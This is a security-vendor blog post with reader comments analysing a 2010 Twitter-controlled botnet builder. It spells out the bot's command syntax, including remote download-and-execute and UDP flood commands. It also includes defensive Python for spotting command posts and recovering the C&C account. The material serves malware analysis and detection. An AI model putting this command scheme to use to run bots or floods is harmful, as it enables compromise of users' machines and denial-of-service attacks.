Twitter®-Controlled Botnet SDK At Large
Huge armies of zombified computers unanimously executing the commands sent by their master: that is what comes to mind at the sound of the word “botnet”. Fortunately, writing a bot is an extremely tedious task that takes a lot of in-depth programming knowledge, so not everyone can become a botmaster overnight, despite the obvious financial advantages.
BitDefender has released an emergency update to protect against a potential pandemic caused by the emergence of a botnet self-development kit controllable via the popular social media service Twitter®. To create a custom bot, an attacker only has to launch the SDK, enter a Twitter username that will act as the command and control (C&C) center, and change the resulting bot’s name and icon to suit their distribution method.
The newly created bot constantly polls the specified Twitter® profile (available at http://www.twitter.com/[userprofile-name]) for posts resembling specially crafted commands. To avoid confusion with ordinary posts, all six supported commands have to start with a period:
- The .VISIT command accepts two parameters separated by the * sign: .VISIT*URL*1 or .VISIT*URL*0. It makes the bot visit the web page specified in the URL parameter; the second parameter tells the bot whether to open the URL in a visible (1) or an invisible (0) window.
- The .SAY command takes a single parameter and initializes the Microsoft Text-To-Speech Engine to read it aloud. Example: .SAY*Something to say.
Up to this point, the bot looks more like a prank tool than a dangerous piece of malware. However, things get serious with the inclusion of the following two commands.
- The .DOWNLOAD command takes a URL as the first parameter and either 0 or 1 as the second: .DOWNLOAD*URL/somefile.exe*0 or .DOWNLOAD*URL/somefile.exe*1. The URL tells the bot where to fetch the file from, while the numeric parameter tells it whether the file should be executed once the download completes.
- The .DDOS*IP*PORT command triggers a UDP flood attack against the indicated IP address on the specified port number (be it a computer, router or server), taking the criminal game to a whole new level of aggression.
Terminating the tasks:
- .STOP makes the bots stop repetitive actions such as visiting web resources or hammering an IP to cause a DDOS condition, and return to a “listening” state.
- The .REMOVEALL command tells the bots to disconnect from the Twitter account and stay dormant until the next restart. This practically eliminates all traffic between the bot and the Web, making it less “visible” to network packet monitoring tools such as Wireshark®.
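The command language described above is simple enough to recognise mechanically, which is useful when hunting for C&C accounts in a timeline of posts or in a network capture. The following Python is an added example (not BitDefender's code, nor anything from the TwitterNET Builder itself) that parses a post into one of the six commands, validates its parameters and assigns a defender's severity rating so that download-and-execute and flood commands surface first. The sample posts, the `example.test` domain and the `192.0.2.10` address are constructed for illustration.

```python
import ipaddress
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import urlparse

# Command vocabulary as described in the article: a leading period, '*' as the
# parameter separator. Values are the number of parameters each command expects.
KNOWN_COMMANDS = {
    "VISIT": 2, "SAY": 1, "DOWNLOAD": 2, "DDOS": 2, "STOP": 0, "REMOVEALL": 0,
}

@dataclass
class BotCommand:
    name: str
    params: List[str]
    severity: str   # one of: info, low, medium, high
    reason: str

def _looks_like_url(s: str) -> bool:
    p = urlparse(s)
    return p.scheme in ("http", "https") and bool(p.netloc)

def _valid_port(s: str) -> bool:
    return s.isdigit() and 0 < int(s) <= 65535

def parse_command(post: str) -> Optional[BotCommand]:
    """Parse one post; return None if it is not a TweetBot-style command."""
    text = post.strip()
    if not text.startswith("."):
        return None
    head, *rest = text[1:].split("*")
    name = head.upper()
    if name not in KNOWN_COMMANDS:
        return None
    # .SAY reads free text, so everything after the first '*' is one parameter.
    params = ["*".join(rest)] if name == "SAY" and rest else rest
    expected = KNOWN_COMMANDS[name]
    if len(params) != expected:
        return BotCommand(name, params, "info",
                          f"malformed: expected {expected} parameter(s), got {len(params)}")
    if name == "DOWNLOAD":
        url, flag = params
        if not _looks_like_url(url) or flag not in ("0", "1"):
            return BotCommand(name, params, "info", "malformed DOWNLOAD parameters")
        if flag == "1":
            return BotCommand(name, params, "high", "download and execute remote binary")
        return BotCommand(name, params, "medium", "download remote file without executing")
    if name == "DDOS":
        ip, port = params
        try:
            ipaddress.ip_address(ip)
        except ValueError:
            return BotCommand(name, params, "info", "malformed DDOS target")
        if not _valid_port(port):
            return BotCommand(name, params, "info", "malformed DDOS port")
        return BotCommand(name, params, "high", "UDP flood against a target")
    if name == "VISIT":
        url, flag = params
        if not _looks_like_url(url) or flag not in ("0", "1"):
            return BotCommand(name, params, "info", "malformed VISIT parameters")
        if flag == "0":
            return BotCommand(name, params, "medium", "hidden-window page visit")
        return BotCommand(name, params, "low", "visible-window page visit")
    if name == "SAY":
        return BotCommand(name, params, "low", "text-to-speech prank")
    # STOP / REMOVEALL: state changes worth logging; REMOVEALL silences the bot,
    # so a sudden drop in polling traffic is itself a signal.
    return BotCommand(name, params, "info", "bot state change")

def scan_posts(posts) -> List[BotCommand]:
    """Return the commands found in a sequence of posts, highest severity first."""
    order = {"high": 0, "medium": 1, "low": 2, "info": 3}
    found = [c for c in (parse_command(p) for p in posts) if c is not None]
    return sorted(found, key=lambda c: order[c.severity])

# Constructed sample timeline (not real tweets); domain and address are
# reserved documentation values.
SAMPLE_POSTS = [
    "Nice weather today, going for a walk.",
    ".SAY*Hello*world",
    ".VISIT*http://example.test/landing*0",
    ".DOWNLOAD*http://example.test/update.exe*1",
    ".DDOS*192.0.2.10*80",
    ".STOP",
    ".FOO*bar",
    ".DOWNLOAD*not-a-url*1",
]

if __name__ == "__main__":
    for cmd in scan_posts(SAMPLE_POSTS):
        print(f"{cmd.severity:6} {cmd.name:<9} {cmd.params} -> {cmd.reason}")
```

Unknown command names and ordinary posts are ignored rather than flagged, and malformed commands are kept at informational level so an analyst can still see them without drowning the high-severity ones.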
This is undoubtedly one of the first attempts at an automated bot creation tool designed to be used with a Twitter C&C. However, the overall mood of the TwitterNET Builder, as it is called, is experimental: the creator did not invest much effort in protecting the generated bots from reverse engineering or from detection and termination, but this flaw does not make them any less dangerous for the average computer user.
One thing to bear in mind, though: a closer look into the file reveals that the wannabe botmaster is not the only one controlling the network. There is a secondary hardcoded Twitter account name, @Korrupt, that may pass commands to any bot generated with the tool, regardless of the C&C account specified by the bot’s creator. At the moment, however, this account does not reveal any traces of criminal activity.
Coordinating a botnet via a Twitter profile has its specific drawbacks (it is a single point-of-failure C&C: once the Twitter account is deleted for abuse, the entire botnet falls apart the next second), but it also has advantages: a botmaster can unleash a large-scale malware pandemic (by silently downloading and executing malware on all the zombie systems) or a DDOS attack simply by tweeting a single line of text from a mobile phone.
To protect customers, BitDefender has added detection for Trojan.TweetBot.A and released a free removal tool, available at http://www.malwarecity.com/files/Anti-TweetBot-EN.rar



Copyright 2011. Site powered by Bitdefender
Randolf said on May-18-2010 04:45
Bogdan Botezatu said on May-18-2010 05:47
Paperghost said on May-18-2010 12:56
http://www.theregister.co.uk/2010/05/13/diy_twitter_botnets/
And noticed the Twitter account in the code. However, I didn't mention it in the blog entry as I suspected it was an error by the creator. The individual who made the kit in the first place is called Korruptz, and their Twitter account was korruptznet. I guessed at the time they'd either mangled their code, or entered an incomplete Twitter handle by accident. Given the difference in biographical data between both entities (a quick check of various forum posts, websites and blogs confirms these differences) it rather seems that "incomplete Twitter handle entered by accident" would be the best bet. Unfortunate, but not uncommon.
Korrupt said on May-18-2010 14:32
I hadn't understood your post as an accusation, and it's a strange feeling to become master of a botnet without further ado :o)
Seriously - I'm as surprised as any other may be in this situation. I contacted BitDefender on the issue; I know someone there personally and may be of assistance in case the botnet is actually used. I'll keep you informed.
greetz,
Korrupt
Bogdan Botezatu said on May-18-2010 16:29
fish said on May-19-2010 16:43
Bogdan Botezatu said on May-20-2010 03:05
fish said on May-20-2010 03:11
So, in my post, the ampersand character in the `C-and-C server` term was treated as an application/x-www-form-urlencoded string separator.
Please delete my previous comment - I'll re-post it this afternoon.
fish said on May-20-2010 09:45
Bogdan, are you sure the `@Korrupt@` string in the binary really leads to a backdoor? At least in the sample I just had a look at, `@Korrupt@` was just the string used as the delimiter of the given C-and-C twitter account name.
The commands are fetched by the getCommands() method from a URI contained in a variable called TwitterURL (most probably due to incomplete obfuscation) which is set by the main form load handler. I posted a (partially de-obfuscated) disassembly of the method found in my sample on pastebin.com: http://pastebin.com/EQvgExUt
I also dumped the obfuscator's method used for string decryption (renamed to obfuscatorClass.getString() in the disassembly) and used it to write my own C-Sharp application which decodes any obfuscated string from the binary; it can be found at http://pastebin.com/8AeakYVe
Using this, I've decoded the string literals used in the load handler (which sets TwitterURL):
-----
$ mono StringDecoder.exe TwitterNet.exe 44b0ba0b
@Korrupt@
$ mono StringDecoder.exe TwitterNet.exe 44b0bbbf
https://twitter.com/
-----
This leads to the fact that the string literal at 0x44b0ba0b, which is used as the delimiter parameter passed to Strings.Split, is `@Korrupt@`. In the next line, the string between the first and the second occurrence of `@Korrupt@` (which is the C-and-C account name specified) and the string literal at 0x44b0bbbf (which is `https://twitter.com/`) are concatenated to form the TwitterURL.
Is my sample just different from the one you analyzed?
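The comment above describes a concrete parsing step (split the embedded configuration on `@Korrupt@`, take the text between the first and second occurrence, prefix it with `https://twitter.com/`). The Python below is an added example, written here and not taken from fish's pastebin or from the bot, that reproduces that logic as an analyst helper: given the decoded strings of a sample, it recovers the C&C handle and the URL the bot would poll. It is stricter than the described bot code in one respect, labelled in the comments: it refuses a blob that does not carry two delimiters instead of taking whatever follows a lone one. The `SAMPLE_STRINGS` list and the `example_botmaster` handle are constructed for illustration.

```python
from typing import Iterable, Optional

# Values quoted in the comment above as recovered with StringDecoder.
DELIMITER = "@Korrupt@"
TWITTER_BASE = "https://twitter.com/"

def extract_cnc_account(blob: str, delimiter: str = DELIMITER) -> Optional[str]:
    """Mirror the described Strings.Split step: the C&C handle is the text
    between the first and second occurrence of the delimiter.

    Analyst-side strictness (assumption, not the bot's behaviour): .NET's Split
    would still return an element at index 1 when only one delimiter is present,
    so a malformed blob would make the bot poll a junk handle; here such a blob
    yields None so it can be reported instead of silently accepted."""
    pieces = blob.split(delimiter)
    if len(pieces) < 3 or not pieces[1]:
        return None
    return pieces[1]

def build_twitter_url(blob: str, delimiter: str = DELIMITER) -> Optional[str]:
    """Concatenate the base URL and the handle, as the load handler is described doing."""
    account = extract_cnc_account(blob, delimiter)
    return None if account is None else TWITTER_BASE + account

def find_cnc_url(decoded_strings: Iterable[str]) -> Optional[str]:
    """Scan decoded strings (e.g. StringDecoder output) for the first
    delimiter-wrapped handle and return the profile URL the bot would poll."""
    for s in decoded_strings:
        url = build_twitter_url(s)
        if url is not None:
            return url
    return None

# Constructed sample: the handle and the surrounding bytes are made up.
SAMPLE_STRINGS = [
    "@Korrupt@",                                   # the delimiter literal alone
    "https://twitter.com/",                        # the base URL literal
    "cfg:@Korrupt@example_botmaster@Korrupt@:end", # delimiter-wrapped C&C handle
]

if __name__ == "__main__":
    # The bare delimiter string never produces a URL; only the wrapped handle does.
    print(find_cnc_url(SAMPLE_STRINGS))
```

Run over the constructed list, the bare `@Korrupt@` literal yields nothing, which is the point of the comment: on its own the string selects a handle rather than naming one.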
Bogdan Botezatu said on May-20-2010 16:43
The sample I took a look at had no signs of obfuscation, which made me label it as an amateur's work. Everything the bot contained was in plain and was loaded from a file called stub.exe. I looked at your code but it doesn't seem to resemble what I've got. I'll take a second glance at the file in the morning; a pair of fresh eyes can work miracles.
Razz ^,^ said on Jun-22-2010 10:52